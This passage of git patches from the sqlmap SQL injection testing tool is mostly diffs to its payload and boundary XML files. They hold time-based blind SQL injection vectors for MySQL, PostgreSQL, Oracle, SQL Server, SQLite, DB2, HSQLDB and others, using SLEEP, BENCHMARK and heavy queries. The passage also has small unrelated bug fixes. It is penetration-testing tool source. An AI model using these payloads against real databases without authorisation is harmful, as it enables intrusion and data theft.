-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>    
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
 
     <test>
         <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
-        <risk>2</risk>
+        <risk>3</risk>
         <clause>1,2,3</clause>
         <where>1</where>
         <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
@@ -929,7 +1173,7 @@
         </details>
     </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of OR time-based blind tests -->
+    <!-- End of time-based blind tests -->
 
     <!-- Time-based tests - LIMIT clause -->
     <!-- This payload does not work with SLEEP() -->

From 80fb2e29cc9ecd14bc40919ce2e616873f37b517 Mon Sep 17 00:00:00 2001
From: Christ van Willegen <cvwillegen+gh@gmail.com>
Date: Wed, 4 Mar 2015 13:31:29 +0100
Subject: [PATCH 380/492] Fix some spelling errors in help texts (through ->
 thorough)

---
 lib/parse/cmdline.py   | 4 ++--
 lib/request/connect.py | 2 +-
 sqlmap.conf            | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 6cda6f500..fcb38b54d 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -694,7 +694,7 @@ def cmdLineParser():
 
         miscellaneous.add_option("--identify-waf", dest="identifyWaf",
                                   action="store_true",
-                                  help="Make a through testing for a WAF/IPS/IDS protection")
+                                  help="Make a thorough testing for a WAF/IPS/IDS protection")
 
         miscellaneous.add_option("--mobile", dest="mobile",
                                   action="store_true",
@@ -710,7 +710,7 @@ def cmdLineParser():
 
         miscellaneous.add_option("--smart", dest="smart",
                                   action="store_true",
-                                  help="Conduct through tests only if positive heuristic(s)")
+                                  help="Conduct thorough tests only if positive heuristic(s)")
 
         miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
                             help="Prompt for an interactive sqlmap shell")
diff --git a/lib/request/connect.py b/lib/request/connect.py
index e2e7d2a18..31dba92d2 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -701,7 +701,7 @@ class Connect(object):
                     payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                 value = agent.replacePayload(value, payload)
             else:
-                # GET, POST, URI and Cookie payload needs to be throughly URL encoded
+                # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
                 if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                     payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                     value = agent.replacePayload(value, payload)
diff --git a/sqlmap.conf b/sqlmap.conf
index cc506987d..55f298b7a 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -735,7 +735,7 @@ disableColoring = False
 # Default: 1
 googlePage = 1
 
-# Make a through testing for a WAF/IPS/IDS protection.
+# Make a thorough testing for a WAF/IPS/IDS protection.
 # Valid: True or False
 identifyWaf = False
 
@@ -747,7 +747,7 @@ mobile = False
 # Valid: True or False
 pageRank = False
 
-# Conduct through tests only if positive heuristic(s).
+# Conduct thorough tests only if positive heuristic(s).
 # Valid: True or False
 smart = False
 

From 2bdf1219155ed1461a35e09a78114042b0dbf8b7 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 4 Mar 2015 13:36:09 +0000
Subject: [PATCH 381/492] cleanup

---
 xml/payloads/01_boolean_blind.xml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
index 76a1aaadd..19f2b1ce9 100644
--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -413,6 +413,7 @@ Tag: <test>
             <dbms>MySQL</dbms>
         </details>
     </test>
+
     <test>
         <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
         <stype>1</stype>

From 9bd41ed99d7360c561986125687e70b043c92fc0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 9 Mar 2015 22:01:59 +0100
Subject: [PATCH 382/492] Fixes #1189

---
 lib/utils/api.py | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 9337fe000..15a1047b6 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -29,6 +29,7 @@ from lib.core.datatype import AttribDict
 from lib.core.defaults import _defaults
 from lib.core.enums import CONTENT_STATUS
 from lib.core.enums import PART_RUN_CONTENT_TYPES
+from lib.core.exception import SqlmapConnectionException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
 from lib.core.subprocessng import Popen
@@ -66,8 +67,11 @@ class Database(object):
         logger.debug("REST-JSON API %s connected to IPC database" % who)
 
     def disconnect(self):
-        self.cursor.close()
-        self.connection.close()
+        if self.cursor:
+            self.cursor.close()
+
+        if self.connection:
+            self.connection.close()
 
     def commit(self):
         self.connection.commit()
@@ -252,8 +256,11 @@ class LogRecorder(logging.StreamHandler):
 
 def setRestAPILog():
     if hasattr(conf, "api"):
-        conf.database_cursor = Database(conf.database)
-        conf.database_cursor.connect("client")
+        try:
+            conf.database_cursor = Database(conf.database)
+            conf.database_cursor.connect("client")
+        except sqlite3.OperationalError, ex:
+            raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database)
 
         # Set a logging handler that writes log messages to a IPC database
         logger.removeHandler(LOGGER_HANDLER)

From adc8ac267db28335104d37965c1762cef0a44205 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 10 Mar 2015 09:23:26 +0100
Subject: [PATCH 383/492] Fixes #1190

---
 lib/controller/checks.py | 14 ++++++--------
 1 file changed, 6 insertions(+), 8 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index e680b479a..922a413a6 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -719,16 +719,14 @@ def checkFalsePositives(injection):
         kb.injection = injection
 
         for i in xrange(conf.level):
-            randInt1, randInt2, randInt3 = (_() for j in xrange(3))
+            while True:
+                randInt1, randInt2, randInt3 = (_() for j in xrange(3))
 
-            randInt1 = min(randInt1, randInt2, randInt3)
-            randInt3 = max(randInt1, randInt2, randInt3)
+                randInt1 = min(randInt1, randInt2, randInt3)
+                randInt3 = max(randInt1, randInt2, randInt3)
 
-            while randInt1 >= randInt2:
-                randInt2 = _()
-
-            while randInt2 >= randInt3:
-                randInt3 = _()
+                if randInt3 > randInt2 > randInt1:
+                    break
 
             if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
                 retVal = None

From 25b23750e811eced36b77a427a4b70328ad7fe4d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 12 Mar 2015 11:49:52 +0100
Subject: [PATCH 384/492] Bug fix for crawling over non-80 port

---
 lib/utils/crawler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 1d7033d26..733c305e9 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -123,7 +123,7 @@ def crawl(target):
             test = readInput(message, default="Y")
             if test[0] not in ("n", "N"):
                 items = None
-                url = "%s://%s/sitemap.xml" % (conf.scheme, conf.hostname)
+                url = "%s://%s:%d/sitemap.xml" % (conf.scheme, conf.hostname, conf.port)
                 try:
                     items = parseSitemap(url)
                 except:

From f5df80527cd4c97967f459d2f706679fb6d1bb0d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 18 Mar 2015 14:26:51 +0100
Subject: [PATCH 385/492] Fixes #1195

---
 thirdparty/magic/magic.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/thirdparty/magic/magic.py b/thirdparty/magic/magic.py
index 036983ae0..e03ddd9ac 100644
--- a/thirdparty/magic/magic.py
+++ b/thirdparty/magic/magic.py
@@ -111,7 +111,10 @@ try:
 
     # This is necessary because find_library returns None if it doesn't find the library
     if dll:
-        libmagic = ctypes.CDLL(dll)
+        try:
+            libmagic = ctypes.CDLL(dll)
+        except WindowsError:
+            pass
 
     if not libmagic or not libmagic._name:
         import sys

From 43f6cb15086cba8067fc9b53eb5e184e00ceecea Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Thu, 19 Mar 2015 12:07:26 +0000
Subject: [PATCH 386/492] some more boundaries

---
 xml/boundaries.xml | 63 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 63 insertions(+)

diff --git a/xml/boundaries.xml b/xml/boundaries.xml
index f33498924..aa9e75eee 100644
--- a/xml/boundaries.xml
+++ b/xml/boundaries.xml
@@ -328,6 +328,42 @@ Formats:
         <suffix> AND '%'='</suffix>
     </boundary>
 
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")</prefix>
+        <suffix> AND ("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"))</prefix>
+        <suffix> AND (("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")))</prefix>
+        <suffix> AND ((("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"</prefix>
+        <suffix> AND "%"="</suffix>
+    </boundary>
+
     <boundary>
         <level>5</level>
         <clause>1</clause>
@@ -337,6 +373,24 @@ Formats:
         <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
     </boundary>
 
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
     <boundary>
         <level>4</level>
         <clause>1</clause>
@@ -354,6 +408,15 @@ Formats:
         <prefix></prefix>
         <suffix>-- [RANDSTR]</suffix>
     </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix># [RANDSTR]</suffix>
+    </boundary>
     <!-- End of WHERE/HAVING clause boundaries -->
 
     <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->

From 9eb7a0a0f2cb56f5359d6aa432e46efb7913dd67 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Thu, 19 Mar 2015 12:09:43 +0000
Subject: [PATCH 387/492] enhanced time-based payloads - issue #1169

---
 xml/payloads/05_time_blind.xml | 316 +++++++++++++++++++++++++--------
 1 file changed, 241 insertions(+), 75 deletions(-)

diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 95a6f5160..e8993f92b 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -1,9 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
 
 <root>
-    <!-- Time-based blind tests -->
+    <!-- Time-based boolean tests -->
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SELECT)</title>
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
@@ -18,12 +18,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SELECT)</title>
         <stype>5</stype>
         <level>1</level>
         <risk>3</risk>
@@ -38,12 +38,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SELECT - comment)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -59,12 +59,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SELECT - comment)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
@@ -80,12 +80,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
         <stype>5</stype>
         <level>2</level>
         <risk>1</risk>
@@ -100,12 +100,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
@@ -120,12 +120,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (comment)</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
@@ -141,12 +141,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (comment)</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
@@ -162,12 +162,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
+        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
@@ -182,11 +182,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
+        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
@@ -201,11 +202,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
+        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
@@ -221,11 +223,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query - comment)</title>
+        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
@@ -239,6 +242,168 @@
         <response>
             <time>[DELAYED]</time>
         </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+             <dbms_version>&gt;= 5.0.12</dbms_version>
+       </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
+        <request>
+            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
